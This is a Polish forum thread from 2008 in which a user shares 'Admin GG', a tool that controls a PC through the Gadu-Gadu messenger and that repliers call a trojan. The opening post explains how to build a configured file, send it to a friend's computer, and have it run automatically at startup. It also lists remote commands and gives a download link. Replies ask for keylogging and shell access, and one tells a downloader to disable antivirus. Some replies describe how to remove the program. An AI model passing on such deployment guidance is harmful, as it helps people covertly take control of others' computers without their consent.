Admin GG v1.6

czarnobyl88

Użytkownik
Dołączył
Luty 5, 2008
Posty
1
Siema
smile.gif


Program Admin GG służy do zdalnego sterowania dowolnym komputerem, działa na zasadzie Client Server, z tym, że nie
potrzebna jest komunikacja bezpośrednia, a więc sterowany komputer nie musi mieć zewnętrznego IP, a co ważniejsze wcale
tego IP znać nie musimy! Program korzysta z serwerów Gadu-gadu oraz z protokołu gg 6.0
Sterowanie komputerem odbywa się poprzez wysyłanie odpowiednich komend poprzez zwykłe okienko rozmowy w GG czy
też innego komunikatora obsługującego sieć gadu gadu.

Obsługa programu:

1. Zakładamy numer Gadu-Gadu.
Aby założyć numer GG, musimy uruchomić komunikator Gadu-Gadu, a następnie, z menu wybrać Użytkownik -> Nowy.
Po założeniu numeru, zapisz sobie nowy numer, oraz hasło do niego.

2. Tworzenie pliku "do zdalnego sterowania komputerem"
Uruchamiamy program Admin GG. W polu oznaczonym jako "numer gg" wpisujemy numer Gadu-Gadu, który
wcześniej założyliśmy (patrz punkt 1), a w polu "hasło gg" hasło do tego numeru.
Następnie klikamy na przycisk "Kompiluj", oraz wskazujemy miejsce gdzie ma zostać zapisany
skonfigurowany przed chwilą plik.

3. Mam skonfigurowany plik, co z nim zrobić?
Plik, który przed chwilą skonfigurowałeś uruchamiasz na komputerze, którym chcesz sterować. Np.
Jeśli zamierzasz sterować komputerem kolegi, wysyłasz mu ten plik np. na emaila lub dajesz na
dyskietce. Żeby program działał, kolega musi uruchomić ten plik na swoim komputerze.
Następnie do swojej listy kontaktów, dodajesz numer, który założyłeś (punkt 1) i który posłużył ci
do konfiguracji pliku, który wysłałeś do kolegi.
Jeśli kolega uruchomił plik na swoim komputerze, numer który dodałeś do listy będzie miał status
"Dostępny", w czasie gdy kolega będzie miał włączony komputer.
Plik uruchomiony na komputerze kolegi, będzie się automatycznie włączał przy starcie systemu
Windows.


Uwaga! Nie możesz dać kilku osobom jednego, tego samego skonfigurowanego pliku! Dzieje się
tak, ponieważ plik używa numeru Gadu-Gadu, który podałeś przy konfiguracji pliku. Jeden
skonfigurowany plik może działać tylko na jednym komputerze. Gdy chcemy wysłać plik kilku
osobom, należy dla każdej z nich skonfigurować osobny plik, każdy z nowym numerem
Gadu-Gadu.

4. Zdalne sterowanie komputerem
Jeśli wykonałeś poprawnie wszystkie instrukcje zawarte w punktach 1, 2, 3, możesz rozpocząć
sterowanie komputerem osoby, która uruchomiła skonfigurowany plik, np. kolega.
Sterowanie odbywa się przez wysyłanie odpowiednich komend, na numer, który zapisałeś na
liście kontaktów zgodnie z punktem trzecim.

Lista komend:
opencd - wysuwa tackę CD-ROM
closecd - wsuwa tackę CD-ROM
spo - wyłącza monitor
turnscr - odwraca obraz na monitorze "do góry nogami"
pulpithide - ukrywa ikony na pulpicie, tym samym go blokując
pulpitshow - pokazuje ikony na pulpicie
timehide - ukrywa zegarek systemowy
timeshow - pokazuje zegarek systemowy
shutdown - wyłącza komputer
open "adres_strony" - uruchamia dowolną stronę internetową w domyślnej przeglądarce,
zamiast "adres_strony" wpisujemy adres dowolnej strony WWW (bez "") np "open www.google.pl"
msg "tresc_komunikatu" - pokazuje komunikat o dowolnej treści np. "msg Mam cię!"
help - pokazuje spis komend.

Komendy można wysyłać na odpowiedni numer jedynie wtedy, gdy jest on Dostępny na liście kontaktów.

A tu macie link do tego programu:
http://www.sendspace.pl/file/ZurpcKGH/
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
mógłbyś go troche rozbudowac np. o przesyłanie plików i cmd bo same funkcje zabway sa raczej zwykle nie potrzebne.
 

Bretos

Użytkownik
Dołączył
Styczeń 11, 2008
Posty
142
Wszystko ladnie, pieknie tylko, ze mógłbyś dodać jeszcze keyloggera, odegranie dźwięku logowania sie(albo coś równie wk..urzającego)
 

and1

Użytkownik
Dołączył
Luty 9, 2008
Posty
1
ej tylko mam pytanie

Jak mozna sie tego pozbyc...? bo oczywiscie musialem wyprobowac na sobie :glupek2:
 

kacpra

Użytkownik
Dołączył
Luty 9, 2008
Posty
1
jak ja sciagam tego trojana to mi przy sciagniu wyskakuje taki komunikat: " Internet Explorer nie moze pobrac ADMIN GG Polaczenie z serwerem zostalo przerwane w nienormalny sposób " ,co mam zrobic ???
 

Kopaczka92

Użytkownik
Dołączył
Luty 2, 2008
Posty
274
znajdz nazwe serweru w plikach systemowych
smile.gif
a jak jest wykrywalny w menagerze procesow to wyłacz proces i wywal to z autostartu
<
 

Bretos

Użytkownik
Dołączył
Styczeń 11, 2008
Posty
142
I nie uzywaj IE...
Teraz nawet menadzer procesow MS'a jest do kitu, lepszy jest Process Explorer prznajmniej wiesz ktory svhost jest systemowy a koty nie. :killer:
 

bialkomat

Użytkownik
Dołączył
Listopad 14, 2005
Posty
14
Originally posted by grzonu
mógłbyś go troche rozbudowac np. o przesyłanie plików i cmd bo same funkcje zabway sa raczej zwykle nie potrzebne.

Faktycznie, wystarczy że dodałbyś CMD i byłoby OK, a tak dla większości jest teraz raczej bezużyteczny.
 

fr0zon

Użytkownik
Dołączył
Styczeń 12, 2007
Posty
147
Na moje to nam nie daje sterowania nad.Pecetem
<
Juz wole Hamachi zainstaloiwac i na tym VNC i bede mogl lepiej sterowac moim PC z innego miejsca. I widze na biezaco obraz z sterowanego PC.
 

maczuga22

Użytkownik
Dołączył
Luty 10, 2008
Posty
1
Siema jeśli ktos otworzyl ten program na swoim komputerze to mozna sie tego pozbyc w sposob

ściagnij sobie np. cleaner zainstaluj go wejdz w auto start usun wszystkie pliki ktore pojawiaja ci sie przy wlaczaniu komputera nastepnie zreseuj kompa potem wejdz w CWindowsmssystem tak sie nazywa ten trojan i go usuwamy
smile.gif


Teraz moje pytanie:

zrobilem wszystko ładnie pieknie to co jest opisane i otworzylem ten plik na swoim komputerze nagle ten numer gg zrobil sie dostepny wpisalem comende "opencd" i sie otworzylo no to ok zrobilem nowe gg nowy plik wyslalem to koledze zapisalem ten numer gg on ten plik otwiera i gdy otwiera ten nr gg powinnien sie zrobic dostepny a sie nierobil ;/


Dodane:
tak jestem pewien wysylalem 3 roznym kolegom nowe wygerenowane pliki i nowe nr gg
<


jest taka osoba co potwierdzi ze to dziala na innym kompie?
 

Bretos

Użytkownik
Dołączył
Styczeń 11, 2008
Posty
142
Bo może "kolega" ma FW albo AV? i jesteś pewien, że dobrze wygenereowałeś server(czy dobrze wpisales numer/haslo??)
 

m@teo

Użytkownik
Dołączył
Luty 12, 2008
Posty
1
witam, czy istnieje jakaś możliwość usunięcia tego pliku który został wygenerowany i podesłany ofiarze z jego komputera?
 

Dark Smark

Były Moderator
Dołączył
Kwiecień 29, 2006
Posty
1953
Originally posted by kacpra
jak ja sciagam tego trojana to mi przy sciagniu wyskakuje taki komunikat: " Internet Explorer nie moze pobrac ADMIN GG Polaczenie z serwerem zostalo przerwane w nienormalny sposób " ,co mam zrobic ???
Wyłącz antywirusa, przerywa pewnie pod koniec tak?
 

c3BuLa

Użytkownik
Dołączył
Grudzień 9, 2007
Posty
2
nie zebym sie czepial
smile.gif
gdy juz zrobimy nasz "server" i otworzymy go np:. przez notatnik to widac na samym dole po lewej stronie nasz numer: gg i haslo do servera gg
smile.gif
taka mala wada
<
Tu to widac : (numer gg i haslo sa przypadkowe)
http://img526.imageshack.us/img526/7468/widacyi2.jpg
widacyi2.jpg

Kod:
http://img526.imageshack.us/img526/7468/widacyi2.jpg
 

bajzonix

Użytkownik
Dołączył
Luty 27, 2008
Posty
1
mam pytanie bo koledzy wysłali mi to i jak sie pozbyć zainfekowanego pliku z admin gg
 

djmentos

Użytkownik
Dołączył
Maj 1, 2007
Posty
1868
Originally posted by c3BuLa
nie zebym sie czepial
smile.gif
gdy juz zrobimy nasz "server" i otworzymy go np:. przez notatnik to widac na samym dole po lewej stronie nasz numer: gg i haslo do servera gg
smile.gif
taka mala wada
<
Tu to widac : (numer gg i haslo sa przypadkowe)
http://img526.imageshack.us/img526/7468/widacyi2.jpg
Obrazek
Kod:
http://img526.imageshack.us/img526/7468/widacyi2.jpg

To daje nam do zrozumienia że program jest zrobiony w Delphi i oparty o arty w necie ;/
 
Do góry Bottom